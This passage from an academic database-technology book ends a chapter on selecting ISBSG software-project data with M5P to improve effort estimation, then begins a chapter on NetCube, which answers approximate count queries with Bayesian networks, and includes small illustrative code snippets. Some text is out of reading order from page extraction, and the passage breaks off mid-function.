THE DATASETS The International Software Benchmarking Standards Group (ISBSG), a non-profit organization, maintains a software project management repository from a variety of organizations. The ISBSG checks the validity and provides benchmarking information to companies submitting data to the repository. Furthermore, it seems that the data is collected from large and successful organizations. In general, such organizations have mature processes and well-established data collection procedures. In this work, we have used the “ISBSG release no. 8”, which contains 2,028 projects and more than 55 attributes per project. The attributes can be classified as follows: • • •
• y = β0 + β1 x1 + β2 x2 + ... + + βk xk + e. Least median squares (LMS) is a robust regression technique that includes outlier detection (Rousseeuw & Leroy, 1987) by minimizing the median rather than the mean. Goodness of fit of the linear models is usually measured by the correlation, co-efficient of multiple determination R2 and by the mean squared error. However, in the software engineering domain, the mean magnitude of relative error (MMRE) and prediction at level l—Pred (l)—are well known techniques for evaluating the goodness of fit in the estimation methods (see the Evaluation of the Techniques and Characterization of Software Engineering Datasets section).
•
Project context, such as type of organization, business area, and type of development; Product characteristics, such as application type user base; Development characteristics, such as development platform, languages, tools, and so forth; Project size data, which is different types of function points, such as IFPUG (2001), COSMIC (2004), and so forth; and Qualitative factors such as experience, use of methodologies, and so forth.
Before using the dataset, there are a number of issues to be taken into consideration. An important attribute is the quality rating given by the ISBSG: its range varies from A (where the submission satisfies all criteria for seemingly sound data) to D (where the data has some fundamental shortcomings). According to ISBSG, only projects classified as A or B should be used for statistical analysis. Also, many attributes in ISGSB are categorical attributes or multi-class attributes that need to be pre-processed for this work (e.g., the
project scope attribute which indicates what tasks were included in the project work effort—planning, specification, design, build, and test—were grouped. Another problem of some attributes is the large number of missing instances. Therefore, in all datasets with the exception of the “reality dataset”, we have had to do some pre-processing. We selected some attributes and instances manually. There are quite a large number of variables in the original dataset that we did not consider relevant or they had too many missing values to be considered in the data mining process. From the original database, we only considered the IFPUG estimation technique and those that can be considered very close variations of IFPUG such as NESMA. We have used four datasets selecting different attributes including the one provided in the “reality tool” by ISBSG. In our study, we have selected NormalisedWorkEffort or SummaryWorkEffort as dependent variables. The normalized work effort is an estimate of the full development life cycle effort for those projects covering less than a full development life cycle while the summary work effort is the actual work effort carried out by the project. For projects covering the full development life cycle and projects where the development life cycle coverage is not known, these values are the same, that is, work effort reported. When the variable summary work effort is used, the dataset included whether each of the life cycle phases were carried out, such as, planning, specification, building and testing. DS1: The reality dataset is composed of 709 instances and 6 attributes (DevelopmentType, DevelopmentPlatform, LanguageType, ProjectElapsedTime, NormalisedWorkEffort, UnadjustedFunctionPoints). The dependent variable for this dataset is the NormalisedWorkEffort. DS2: The dataset DS2 is composed of 1,390 instances and 15 attributes (FP, VAF, MaxTeamSize, DevType, DevPlatf, LangType,
2006
DBMUsed, MethodUsed, ProjElapTime, ProjInactiveTime, PackageCustomisation, RatioWEProNonPro, TotalDefectsDelivered, NormWorkEff, NormPDR). The dependent variable for this dataset is the NormalisedWorkEffort. DS3. The dataset DS3 is composed of 1,390 instances and 19 attributes (FP, SummWorkEffort, MaxTeamSize, DevType, DevPlatf, LangType, DBM Used, MethodUsed, ProjElapTime, ProjInactiveTime, PackageCustomisation, Planning, Specification, Build, Test, Impl, RatioWEProNonPro, TotalDefectsDelivered, ReportedPDRAdj). In this case, we did consider the software life cycle attributes (Planning, Specification, Build, Impl, Test), and, therefore, we were able to use the summary work effort (SummWorkEffort) as the dependent variable. DS4. The dataset DS4 is very similar to DS3 but it uses the unadjusted function points (UnadjFP) and the value adjustment factor (VAF) instead of the adjusted function points (FP). It is also composed of 1,390 instances. The 20 attributes are VAF, SummWorkEffort, MaxTeamSize, DevType, DevPlatf, LangType, DBMUsed, MethodUsed, ProjElapTime, ProjInactiveTime, PackageCustomisation, Planning, Specification, Build, Test, Impl, RatioWEProNonPro, TotalDefectsDelivered, UnadjFP, and ReportedPDRAdj. It also uses the summary work effort (SummWorkEffort) as the dependent variable.
EVALUATION OF THE TECHNIQUES AND CHARACTERIZATION OF SOFTWARE ENGINEERING DATASETS We compare the benefits of the techniques by using linear regression and the least median square as prediction techniques before and after
characterizing the database using the classical mean magnitude of relative error (MMRE) and Pred(%). In software engineering, the standard criteria for a model to be acceptable are Pred(25) ≥ 0.75 and MMRE ≤ 0.25. •
MMRE is computed as MMRE = (1/n) · Σ |ei − êi| / ei, summing over i = 1, …, n,
where in a sample of size n, êi is the estimated value for the i-th element and ei is the actual value. Pred(%) is defined as the number of cases whose estimates fall within the given percentage of the actual value, divided by the total number of cases. For example, Pred(25) = 0.75 means that the estimates for 75% of the cases are within 25% of their actual values.
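A small, self-contained example of both measures (our own illustration, with made-up effort values):

```java
public class FitMeasures {
    public static void main(String[] args) {
        double[] actual    = {520, 1300, 880, 2400, 640};   // made-up actual efforts
        double[] estimated = {480, 1700, 900, 2300, 950};   // made-up model estimates

        double mmre = 0, hits = 0;
        for (int i = 0; i < actual.length; i++) {
            double mre = Math.abs(actual[i] - estimated[i]) / actual[i];
            mmre += mre;
            if (mre <= 0.25) hits++;            // counts toward Pred(25)
        }
        mmre /= actual.length;
        double pred25 = hits / actual.length;

        System.out.printf("MMRE = %.3f, Pred(25) = %.2f%n", mmre, pred25);
    }
}
```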
We will now explain how we proceeded using the reality dataset as it is the smallest of the four datasets used. Once we had our datasets ready, we applied the M5P algorithm using the Weka Toolkit. The M5P algorithm created two clusters, LM1 and LM2 (the other three datasets created a much larger number of clusters). The NormalisedWorkEffort is the dependent variable and a different linear model is applied depending on the UnadjustedFunctionPoints variable. The clusters found can assign to the dependent variable either a constant or a linear equation (in most cases). For example, for the reality dataset, M5P has produced only two branches that are interpreted as follows: if UnadjustedFunctionPoints is less than 343 then we apply LM1 to calculate the NormalisedWorkEffort (see Figure 4). The categorical data of the linear regression function obtained by Weka is calculated substituting the value for the appropriate value wherever it occurs. For example, if we had an instance with DevelopmentPlatform equals to MF, LanguageType equals to ApG and UnadjustedFunctionPoints less than 343 then the linear equation to apply would look like this: LM num: 1 NormalisedWorkEffort =
For evaluating each categorical expression, if the value of the category on the left hand side is equal to any of the categories on the right hand side of the equation, then we substitute the entire equation with value 1; otherwise with the value 0. Following the example, we obtain: LM num: 1 NormalisedWorkEffort = 90.5723 * 1, MR + 63.5148 * 1 + 628.9547 * 0 + 184.9949 * ProjectElapsedTime + 10.9211 * UnadjustedFunctionPoints - 545.8004
From each cluster only those instances that were within the 25% of the actual value, that is, Pred (25), are selected to be part of the characterized database. Afterwards, we applied LR and LSM in all datasets before and after selecting instances. In the case of the reality dataset, the number of instances was reduced from 709 to 139 projects. We also created another dataset by selecting 139 instances randomly from the entire dataset (709 instances). Table 2 compares the MMRE, Pred(25), and Pred(30) results for the reality dataset where the columns named Before are the results obtained using the entire dataset; After columns are the results when applying LR and LSM with only the selected instances. Finally, Random columns are the result when we randomly selected a number of instances equal to the number of instances of the characterized dataset (139 in the case of the reality dataset). For the reality dataset, M5P allowed us to reduce the number of instances in the dataset from 709 to 139 (570 instances). Table 3 shows the result for the DS2 dataset. M5P allowed us to reduce the number of instances in the dataset from 1,390 to 1,012 (378 instances).
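The selection step can be expressed directly against a trained model. The sketch below (our own illustration, assuming the same Weka classes as before) keeps only the instances whose M5P estimate falls within 25% of the actual class value.

```java
import weka.classifiers.trees.M5P;
import weka.core.Instances;

public class SelectWithinPred25 {
    // Return a copy of 'data' containing only instances estimated within 25% of their actual value.
    static Instances characterize(M5P model, Instances data) throws Exception {
        Instances reduced = new Instances(data, 0);          // same header, no instances
        for (int i = 0; i < data.numInstances(); i++) {
            double actual    = data.instance(i).classValue();
            double estimated = model.classifyInstance(data.instance(i));
            if (actual != 0 && Math.abs(actual - estimated) / actual <= 0.25) {
                reduced.add(data.instance(i));
            }
        }
        return reduced;
    }
}
```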
Table 4 shows the results for the DS3 dataset, and the number of instance was reduced by 375. Table 5 shows the results for the DS4 dataset. In this case, the number of instances is reduced by 411. Although the general estimation accuracy of LMS and LR in the datasets used is quite low using the software engineering criteria, their performance is always improved when selecting a fewer number of instances using M5P. Table 6 shows the differences before and after selecting the instances. It is worth noting that the best improvement is in the case where the difference in the number of instances is large. This seems to be quite logical as the larger the number of instances discarded by the data mining algorithm, the cleaner the dataset should be.
CONCLUSION
In this chapter, we characterized 4 datasets created from the ISBSG database, selecting both attributes and instances so that project managers can have a better global vision of the data they manage. To achieve this, we first created several subsets of the ISBSG database using expert knowledge to select attributes. We then made use of Weka's M5P data mining algorithm to create clusters. From these clusters, only those instances that were within 25% of the actual value were selected to be part of the estimation model. When we compared the goodness of using linear regression and the least median square as prediction techniques using the mean magnitude of relative error (MMRE) and Pred(%), the smaller dataset produced better or at least similar results. The result is a new database which represents the original database but with a smaller number of attributes and instances, so that the project manager can get a much better grasp of the information in the database, improving the performance of the rest of the activities.
Further work will consist of using data mining techniques for characterizing not only the instances but also the attributes (in this work, the attributes were selected manually using expert knowledge), by using bi-clustering. More needs to be done for understanding and comparing different clusterization techniques to create segmented models and analyzing its usefulness for project managers.
ACKNOWLEDGMENT This research was supported by the Spanish Research Agency (CICYT TIN2004-06689-C03).
IFPUG. (2001). Function point counting practices, release 4.1.1. Manual. International Function Point Users Group. ISBSG. (2005). International Software Benchmarking Standards Group (ISBSG). Retrieved from http://www.isbsg.org/ Quinlan, J. R. (1986). Induction of decision trees. Machine Learning, 1, 81-106. Quinlan, J. R. (1992). Learning with continuous classes. In the Proceedings of the 5th Australian Joint Conference on Artificial Intelligence, Hobart, Tasmania, November 16-18 (pp. 343-348). Singapore: World Scientific Press. Quinlan, J. R. (1993). C4.5: Programs for machine learning. San Mateo, CA: Morgan Kaufmann.
REFERENCES Breiman, L. (1984). Classification and regression trees. New York: Chapman & Hall/CRC. COSMIC. (2004). COSMIC-FFP measurement manual, version 2.1. Common Software Measurement International Consortium. Fayyad, U., Piatetsky-Shapiro, G., & Smyth, P. (1996). The KDD process for extracting useful knowledge from volumes of data. Communications of the ACM, 39, 27-34.
Rousseeuw, P. J., & Leroy, A. M. (1987). Robust regression and outlier detection. New York: Wiley. STTF. (2004). Software Technology Transfer Finland (STTF). Retrieved from http://www.sttf. fi/eng/indexEnglish.htm Witten, I. H., & Frank, E. (1999). Data mining: Practical machine learning tools and techniques with Java implementations. San Francisco, CA: Morgan Kaufmann.
This work was previously published in Advances in Machine Learning Applications in Software Engineering, edited by D. Zhang and J. Tsai, pp. 1-13, copyright 2007 by IGI Publishing (an imprint of IGI Global).
Section VII
Critical Issues
This section addresses conceptual and theoretical issues related to the field of database technology, which include security issues in numerous facets of the discipline, including security within medical and Web-powered databases. Within these chapters, the reader is presented with analysis of the most current and relevant conceptual inquiries within this growing field of study. Particular chapters also address quality of service issues in information quality, data cleaning, and data classification. Overall, contributions within this section ask unique, often theoretical questions related to the study of database technology and, more often than not, conclude that solutions are both numerous and contradictory.
Chapter 7.1
NetCube:
Fast, Approximate Database Queries Using Bayesian Networks
Dimitris Margaritis, Iowa State University, USA
Christos Faloutsos, Carnegie Mellon University, USA
Sebastian Thrun, Stanford University, USA
ABSTRACT We present a novel method for answering count queries from a large database approximately and quickly. Our method implements an approximate DataCube of the application domain, which can be used to answer any conjunctive count query that can be formed by the user. The DataCube is a conceptual device that in principle stores the number of matching records for all possible such queries. However, because its size and generation time are inherently exponential, our approach uses one or more Bayesian networks to implement it approximately. Bayesian networks are statistical graphical models that can succinctly represent the underlying joint probability distribution of
the domain, and can therefore be used to calculate approximate counts for any conjunctive query combination of attribute values and “don’t cares.” The structure and parameters of these networks are learned from the database in a preprocessing stage. By means of such a network, the proposed method, called NetCube, exploits correlations and independencies among attributes to answer a count query quickly without accessing the database. Our preprocessing algorithm scales linearly on the size of the database, and is thus scalable; it is also parallelizable with a straightforward parallel implementation. We give an algorithm for estimating the count result of arbitrary queries that is fast (constant) on the database size. Our experimental results show that NetCubes
have fast generation and use, achieve excellent compression and have low reconstruction error. Moreover, they naturally allow for visualization and data mining, at no extra cost.
INTRODUCTION In this chapter we will focus on the problem of estimating the result of a count query on a very large database, fast. The problem of computing counts of records from a database with given desired characteristics is a common one in the area of decision support systems, online analytical processing (OLAP), and data mining. A typical scenario is as follows: a customer analyst has access to a database of customer transaction information (e.g., customer A bought items B, C, and D at the store at location X), and is interested in discovering patterns that exhibit an interesting or unusual behavior that might lead to possibly profitable insights into the company’s customer behavior. In other words, the company wants to be able to create a model of its customer base (possibly partial), and the better it is able to do that, the more insights it can obtain from the model and more profitable it has the opportunity to be. In this example scenario an analyst would, through an interactive query process, request count information from the database, possibly drilling down in interesting subsets of the database of customer information. It is very important that the results to these queries be returned quickly, because that will greatly facilitate the process of discovery by the analyst. It is also important that the answers to these queries are accurate up to a reasonable degree, although it is not imperative that they are exact. The analyst wants an approximate figure of the result of the query and getting it correct down to the last digit is not necessary. The methods presented in this chapter are motivated by these observations, that is, the fact that we need great speed coupled with only reasonable accuracy. In the following we present NetCube, a method that can support fast, approximate 2012
queries on very large databases. NetCube can fit approximately a database of billions of records in the main memory of a single workstation. There is no “trick” to this—it is due to the fact that what is stored in memory is not the actual data themselves, but only a model of the data. This model is a Bayesian network (BN), which can be used to answer count queries quickly, albeit only approximately. The speed comes from the fact that only the Bayesian network is used to answer the query, and the database is not accessed at query time. The database is accessed only during the one-time preprocessing phase, when a number of BN models are constructed from it. There are two important considerations relevant to the problem described above: •
• First, the model should be a reasonably accurate description of our database, or at the very least of the quantities derived from them that are of interest. In this problem these quantities are the results of every interesting count query that can be applied to it (e.g., queries with some minimum support such as 10,000 records or 1%).
• Second, the model should be simple enough so that using it instead of the actual data to answer a query should not take an exorbitant amount of time (e.g., more than using the actual database to answer the query) or consume an enormous amount of space (e.g., more space than the actual database uses).
These two issues—accuracy vs. time/space complexity—are conflicting, and the problem of balancing them is a central issue in the AI subfield of machine learning, which concerns itself, among other topics, with the development of models of data. This is because it is always possible to describe the data (or the derived quantities we are interested in) better, or at least as well, with increasingly complex models. However, the cost of such models increases with complexity, in terms of both size (to store the model structure and parameters) and time that it takes to use it
(for computing the relevant quantities, that is, the query counts in our case). The reason we use Bayesian networks here is their good performance in estimating probability distributions in practice and their sound mathematical foundations in probability theory, compared to a multitude of other ad hoc approaches that exist in the literature. In this chapter we first describe a conceptual solution to the problem, we then show how this solution, even though it is difficult to implement exactly, can be done so approximately using NetCube, which uses Bayesian networks. Next we describe methods for producing Bayesian networks from a database and using them to answer database queries, followed by implementation details. Finally we conclude with experimental results for two case studies where NetCube is used.
for unusual patterns in the data might hypothesize a relationship and attempt to confirm or refute it by issuing a variety of aggregation queries (e.g., counts or averages for combinations of values for different subsets of attributes) possibly changing the set of attributes; for example, adding or deleting attributes from it. If the current hypothesis is refuted, he or she might move to a completely different subset of attributes to start examining a different hypothesis. A summary of this interactive data mining procedure, as given by Gray, Bosworth, Layman, and Pirahesh (1996), divides it into four distinct steps: 1.
Formulate a query that extracts data from the database. Execute the query, extracting aggregated data from the database into a file or relation. Visualize the results in a graphical way. Analyze the results and formulate a new query (go to step 1).
2. 3. 4.
DATACUBES: PRECOMPUTING ALL POSSIBLE AGGREGATE QUERIES
To facilitate the quick retrieval of the aggregated data, Gray et al. (1996) introduced the idea of the DataCube. A DataCube is a conceptual
As described above, a typical data mining scenario involving a human requires real-time interaction with the database. In particular, the analyst looking
Figure 1. An example count DataCube for a domain of 3 binary attributes A, B, and C, containing 2^3 = 8 tables. The notation A corresponds to the assignment (A = 1) and Ā to (A = 0).
device that contains all possible aggregates over all possible subsets of attributes of a domain of interest. For example, for a hypothetical database containing 1,000 records and 3 attributes A, B, C, each taking values 0 or 1, the count DataCube is shown in Figure 1. There are 23 = 8 possible subsets of these 3 attributes (from the empty set to the entire set {A, B, C}). For each of these subsets, a table is stored in the DataCube containing the counts for every possible combination of values for the attributes in the subset, for example, for {A, B} there are 4 entries in the corresponding table, namely count(A = 1, B = 1) = 400, count(A = 1, B = 0) = 35, count(A = 0, B = 1) = 400, and count(A = 0, B = 0) = 165. We will restrict our attention to count DataCubes here, and refer to them simply as “DataCubes” from now on. However, other types of DataCubes exist that correspond to other aggregates, for example, average, max, min, or median DataCubes. Note that some of these can be computed from count DataCubes (e.g., average DataCubes). We can see that, using the DataCube of a database, computation of any query takes constant time (for a table-lookup implementation). In practice however, computation and storage of the DataCube is exceedingly difficult because of its inherently exponential nature. To solve this problem, several approaches have been proposed. Harinarayan, Rajaraman, and Ullman (1996) suggest materializing only a subset of tables and propose a principled way of selecting which ones to prefer. Their system computes the query from those tables at run time. DataCubes containing only cells of some minimum support are suggested by Beyer and Ramakrishnan (1999), who propose coarse-to-fine traversal that improves speed by condensing cells of less than the minimum support. Histogram-based approaches also exist (Ioannidis & Poosala, 1999), as well as approximations such as histogram compression using the DCT transform (Lee, Kim, & Chung, 1999) or wavelets (Vitter & Wang, 1999). Perhaps closest to the methods described in this chapter
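To make the table-lookup view concrete, here is a toy count DataCube for the three-attribute example, stored as a map from an attribute-value pattern (with nulls as "don't cares") to a count. It is a sketch of the idea rather than the chapter's implementation, and the records it inserts are made up. Even this toy version materializes an entry for every one of the 2^3 attribute subsets of every record, which is exactly the exponential blow-up discussed in the text.

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;

public class ToyDataCube {
    // Key: pattern over (A, B, C) where null means "don't care"; value: number of matching records.
    static Map<String, Integer> cube = new HashMap<String, Integer>();

    static void addRecord(Integer a, Integer b, Integer c) {
        Integer[] r = {a, b, c};
        for (int mask = 0; mask < 8; mask++) {              // every subset of the 3 attributes
            Integer[] pattern = new Integer[3];
            for (int i = 0; i < 3; i++) pattern[i] = ((mask >> i) & 1) == 1 ? r[i] : null;
            String key = Arrays.toString(pattern);
            Integer old = cube.get(key);
            cube.put(key, old == null ? 1 : old + 1);
        }
    }

    public static void main(String[] args) {
        addRecord(1, 1, 0);                                  // a few made-up records
        addRecord(0, 1, 1);
        addRecord(1, 0, 0);
        // count(A = 1, B = don't care, C = 0): constant-time lookup once the cube is built
        System.out.println(cube.get(Arrays.toString(new Integer[]{1, null, 0})));
    }
}
```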
is Barbará (1998), which uses linear regression to model DataCubes. Bitmaps are another relatively recent method for efficiently computing counts from highly compressed bitmapped information about the properties of records in the database. Bitmaps are exact techniques that do not maintain counts, but instead store, for every record in the database, one bit for every attribute and value combination. To answer an aggregate query, they perform a pass over several bitmaps at runtime (Chan & Ioannidis, 1999; Johnson, 1999). Even though query optimizers for bitmaps exist (Wu, 1999), the runtime is still linear in the size of the database. In the next section, we describe the relation that exists between the DataCube of a database and a Bayesian network. Following this, we present methods for constructing BNs from data and using them to implement a DataCube approximately.
RELATION BETWEEN BAYESIAN NETWORKS AND DATACUBES

Figure 2. (a) Example DataCube from Figure 1 constructed from a database of 1,000 records containing attributes A, B, and C. (b) Bayesian network generated from the same database. The Bayesian network can describe exactly the same counts as the DataCube but consumes less space in this example because B and C are independent (unconditionally). [The network has nodes B ("burglar") and C ("earthquake") as parents of A ("alarm"), with parameters P(B = 1) = 0.8, P(C = 1) = 0.25, P(A = 1 | B = 1, C = 1) = 0.2, P(A = 1 | B = 1, C = 0) = 0.6, P(A = 1 | B = 0, C = 1) = 0.4, and P(A = 1 | B = 0, C = 0) = 0.1.]

In this section, we highlight the aspects of Bayesian networks that relate to our implementation of approximate DataCubes for count queries. We illustrate the relation of DataCubes to BNs using the DataCube of Figure 1, shown again here for convenience in Figure 2(a). This DataCube, possibly taken from the research department of a company that manufactures burglar alarms, is constructed from a database that contains 1,000 records and three Boolean attributes A ("home alarm goes off"), B ("burglar enters the house") and C ("earthquake occurs"). Although we will assume that all attributes are binary, this is not necessary and does not affect the generality of our methods. In Figure 2(b) we can see the corresponding Bayesian network for this domain. The structure of the BN encodes independencies that hold in the domain; for example, the fact that the edge between B and C in the BN is missing indicates that although A may depend on B and A
may depend on C, B and C are (unconditionally) independent. The main idea in this section is that the BN can be used to answer any count query that can be posed on the original database. For example, count(A = 1, B = 1, C = 0) = 360, as stored in the DataCube; the same answer can be obtained using the BN as follows: Pr(A = 1, B = 1, C = 0) = Pr ( A = 1 | B = 1, C = 0) Pr (B = 1, C = 0) = Pr (A = 1 | B = 1, C = 0) Pr (B = 1) Pr (C = 0) = 0.6 · 0.8 · 0.75 = 0.36. The estimated count can be calculated by multiplying with the size of the database, that is, count(A = 1, B = 1, C = 0) = 0.36 · 1000 = 360. In this case, answering the query was relatively easy because it was a saturated one. A query is called saturated if it involves all attributes in the database. An unsaturated query may be more difficult to answer using the BN. An example of an
unsaturated query is count(A = 0, B = 1). Using the BN we can answer it as follows: Pr( A = 0, B = 1) = Pr (A = 0, B = 1, C = 0) + Pr (A = 0, B =1, C = 1) = Pr (A = 0 | B = 1, C = 0) Pr (B = 1) Pr (C = 0) + Pr (A = 0 | B = 1, C = 1) Pr (B = 1) Pr (C = 1) = 0.4 · 0.8 · 0.75 + 0.8 · 0.8 · 0.25 = 0.4 which gives count(A = 0, B = 1) = 0.4 · 1,000 = 400, coinciding with the value in the DataCube. As is well known, a BN represents the joint probability distribution function (PDF) of a domain. In general, a probability distribution can be specified with a set of numbers whose size is exponential in the number of attributes in the domain, namely the entries in the joint PDF table. One can represent such a table by a completely connected BN without any great benefit. However, when independencies exist in the domain, using
a BN instead of the full joint probability table results in at least two major benefits:

1. Storage savings: These may be significant, to the point where infeasibly large domains may become representable, provided that they exhibit a sufficient number of independencies among the variables of the domain.
2. Clear and intuitive representation of independencies: Given the graphical representation of a BN, it is easy to determine the variables on which a quantity of interest depends statistically (under assumptions), which variables are irrelevant, and under what conditions. Edge omissions indicate the existence of conditional independencies among variables in the domain.

As mentioned above, if all variables in the domain are statistically dependent on all others, then there is no storage advantage to using a BN, because the storage required for the specification of the network is exponential in the number of attributes. Fortunately, in practice this is not the norm, and in fact the most interesting domains for data mining are those that exhibit a considerable number of independencies. The storage space savings in this domain are illustrated in Figure 2(b). The numbers that have to be stored in the DataCube are 20 essential counts. The numbers necessary in the corresponding BN are 6 probability entries. We see that for this particular example this is certainly not a significant improvement, especially considering the overhead of specifying the parents of each node and using floating point numbers for the probability entries. However, for large networks with tens or hundreds of variables, the savings increase exponentially if the corresponding network is sparse. For n attributes, the DataCube has to store 2^n tables of counts, with each table having size equal to the product of the cardinalities of the attributes it includes (minus one). No full joint table for hundreds of variables containing either
probabilities or counts could ever be stored using today's technology. However, such a domain may be succinctly represented by a Bayesian network instead, if a sufficient number of conditional independencies exist. An interesting application of Bayesian networks that highlights the fact that they can be used to estimate counts is the approach by Getoor, Taskar, and Koller (2001). Getoor et al. (2001) use a relational extension of Bayesian networks, called probabilistic relational models, to estimate the size of "select" or "select-join" database queries (returning the number of matching records) in cases where data is stored in more than one relation of a database. Their approach is useful for finding the optimal query execution plan before a query is executed, which is an important and difficult problem in database query processing.
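The saturated and unsaturated count queries worked out above can be reproduced mechanically by summing out the unmentioned variables of the joint distribution defined by the network. The sketch below does this for the burglar-alarm example; the CPT values are the ones quoted in the text, while the function names are illustrative only.

from itertools import product

N = 1000                       # database size
P_B = 0.8
P_C = 0.25
# P(A=1 | B, C), indexed by (b, c); values quoted in the chapter's example.
P_A = {(1, 1): 0.2, (1, 0): 0.6, (0, 1): 0.4, (0, 0): 0.1}

def joint(a, b, c):
    """Joint probability factorized according to the BN: B and C are parents of A."""
    pb = P_B if b else 1 - P_B
    pc = P_C if c else 1 - P_C
    pa = P_A[(b, c)] if a else 1 - P_A[(b, c)]
    return pa * pb * pc

def count_query(**fixed):
    """Estimated count for a (possibly unsaturated) query, e.g. count_query(A=0, B=1)."""
    total = 0.0
    for a, b, c in product([0, 1], repeat=3):
        assignment = {"A": a, "B": b, "C": c}
        if all(assignment[k] == v for k, v in fixed.items()):
            total += joint(a, b, c)
    return N * total

print(count_query(A=1, B=1, C=0))   # saturated query: 360.0
print(count_query(A=0, B=1))        # unsaturated query: 400.0

Summing out all unmentioned variables is exponential in general; in larger domains one would use standard Bayesian-network inference rather than this brute-force enumeration.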
LEARNING BAYESIAN NETWORKS FROM DATA Our approach, presented in the next section, uses one or more Bayesian networks to represent the database. In this section we describe the prevalent techniques that are used for learning Bayesian networks. We first describe the easier task of computing the parameters of a BN when its structure is known, followed by one possible method for learning the structure in the next section. We first describe the notation and symbols we will use. The database is denoted as D and its size N = |D|. Throughout the chapter, we refer to attributes and variables interchangeably because BN variables correspond to attributes in the database. We assume that set U = {X1, X2, . . . , Xn} contains all n attributes in the domain. A BN is a pair B = 〈E,T〉, where E is the set of edges among the variables in U and T is the set of local conditional probability tables (the BN parameters) for the structure defined by E. We denote sets of variables with bold letters. The parents of Xi in the BN are denoted as Pai, and their j-th value
(attribute value configuration) as paij. We assume that variable Xi can take one of ri values and its parents one of qi configurations. We assume that all local probability distribution functions of a BN are members of the multinomial family.
Learning the Parameters

A BN is essentially a statistical model. Learning the parameters of a statistical model is a well-known problem in statistics. The parameters of a BN are the probabilities contained in the conditional probability tables representing the local PDF for each variable in the domain. In the BN literature, where Bayesian approaches seem to be dominant, the parameters themselves are assumed to follow a probability distribution. Before any data are observed, a prior distribution Pr(parameters) is assumed over the parameters of the local PDFs (for example, this can be uniform). This prior distribution may have parameters of its own—although usually fewer than the number of parameters it covers—which are called hyperparameters. Given a data set, a posterior distribution Pr(parameters | data) can be calculated according to Bayes' law:

\Pr(\text{parameters} \mid \text{data}) = \frac{\Pr(\text{data} \mid \text{parameters})\,\Pr(\text{parameters})}{\Pr(\text{data})}.

The term Pr(data | parameters) is called the data likelihood, or simply likelihood. Informally, the term Pr(data) can be calculated as a sum (or integral) over all possible parameter values, that is,

\Pr(\text{data}) = \sum_{\text{parameter values}} \Pr(\text{data} \mid \text{parameters})\,\Pr(\text{parameters}).

The parameters of a BN are the probabilities stored in the local PDFs. Let p_ijk be the probability that variable X_i takes its k-th value (out of r_i possible ones) when its parents Pa_i in Bayesian network B = 〈E, T〉 take their j-th value pa_ij (out of q_i possible ones). The likelihood of a data set D that contains N_ijk records in which X_i = x_ik and Pa_i = pa_ij is given by the multinomial distribution

\Pr(\text{data} \mid \text{parameters}) = \Pr(D \mid \{p_{ijk}\}) = N!\,\prod_{i=1}^{n}\prod_{j=1}^{q_i}\prod_{k=1}^{r_i} \frac{p_{ijk}^{N_{ijk}}}{N_{ijk}!}.

For the prior distribution, it is frequently desirable to choose one from a family that is conjugate prior to the data distribution. A prior is called conjugate when its posterior belongs to the same family as the prior (albeit possibly with different hyperparameters). The conjugate prior family for the multinomial data distribution is the Dirichlet; we present only this case in some detail here. For other cases, such as linear regression with Gaussian noise, see Buntine (1993) and Heckerman and Geiger (1995), or for more complicated ones representable by artificial neural networks, see Monti and Cooper (1998). Also, for more details on conjugate priors, see Casella and Berger (1990). In a BN, we have a number of Dirichlet priors, one for each variable X_i and value pa_ij of its parents Pa_i in the network. The Dirichlet distribution over the parameters p_ij1, p_ij2, . . . , p_ijri is expressed by:

\Pr(p_{ij1}, p_{ij2}, \ldots, p_{ijr_i} \mid E) = \mathrm{Dir}(\alpha_{ij1}, \alpha_{ij2}, \ldots, \alpha_{ijr_i}) = \frac{\Gamma(\alpha_{ij})}{\prod_{k=1}^{r_i}\Gamma(\alpha_{ijk})}\prod_{k=1}^{r_i} p_{ijk}^{\alpha_{ijk}-1}

where α_ijk are its hyperparameters, α_ij = Σ_k α_ijk, and Γ(·) is the Gamma function. Assuming local and global parameter independence (Cooper & Herskovits, 1992; Heckerman, Geiger, & Chickering, 1995; Spiegelhalter & Lauritzen, 1990), the prior distribution over the entire set of parameters p = {p_ijk} of the BN is the product over all priors:

\Pr(\mathbf{p} \mid E) = \prod_{i=1}^{n}\prod_{j=1}^{q_i} \mathrm{Dir}(\alpha_{ij1}, \alpha_{ij2}, \ldots, \alpha_{ijr_i}).
Conditionally on the data set D, the posterior probability over the parameters is also a member of the Dirichlet family, because the Dirichlet is conjugate prior to the multinomial. It is given by:

\Pr(p_{ij1}, p_{ij2}, \ldots, p_{ijr_i} \mid E, D) = \mathrm{Dir}(N_{ij1} + \alpha_{ij1}, N_{ij2} + \alpha_{ij2}, \ldots, N_{ijr_i} + \alpha_{ijr_i}).

The posterior over all parameters is then:

\Pr(\mathbf{p} \mid E, D) = \prod_{i=1}^{n}\prod_{j=1}^{q_i} \frac{\Gamma(N_{ij} + \alpha_{ij})}{\prod_{k=1}^{r_i}\Gamma(N_{ijk} + \alpha_{ijk})}\prod_{k=1}^{r_i} p_{ijk}^{N_{ijk} + \alpha_{ijk} - 1}   (1)

where N_ij = Σ_k N_ijk is the number of records in D for which Pa_i = pa_ij. Using this distribution to calculate the (posterior) expected value of an arbitrary quantity Q(p), one averages over all possible values of the (unknown) parameters, weighted by the posterior probability of each value: E[Q(p) | E, D] = ∫ Q(p) Pr(p | E, D) dp. This general formula can be used to calculate the parameter values stored in the conditional probability tables of the BN, which are p_ijk = E[p_ijk | E, D], that is:

p_{ijk} = E[p_{ijk} \mid E, D] = \int p_{ijk}\,\Pr(\mathbf{p} \mid E, D)\,d\mathbf{p} = \frac{\alpha_{ijk} + N_{ijk}}{\alpha_{ij} + N_{ij}}.   (2)

Due to the form above, the hyperparameters α_ijk can be thought of as a number of "virtual samples" that are added to the real samples N_ijk for each variable-parent value combination. Popular choices for the hyperparameters are α_ijk = 1 (a uniform prior over the parameters of each X_i for each parent value combination), and α_ijk = 1/r_i. Frequently, for convenience, especially in cases where data are abundant (i.e., when the counts N_ijk dominate the hyperparameters α_ijk), the simple relative-frequency estimate N_ijk / N_ij is used instead of Equation (2). This happens, for example, in score-based methods, where the BIC score is employed, which is itself a large-sample approximation of the posterior and is already assuming that the effects of a prior are negligible.
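A minimal sketch of Equation (2) in code: for one parent configuration, the stored CPT entry is just the Dirichlet-smoothed relative frequency. The tiny data set and the uniform hyperparameter α_ijk = 1 are illustrative assumptions.

def cpt_entry(records, child, child_value, parents, parent_values, r_i, alpha=1.0):
    """Posterior-mean estimate of Pr(child = child_value | parents = parent_values),
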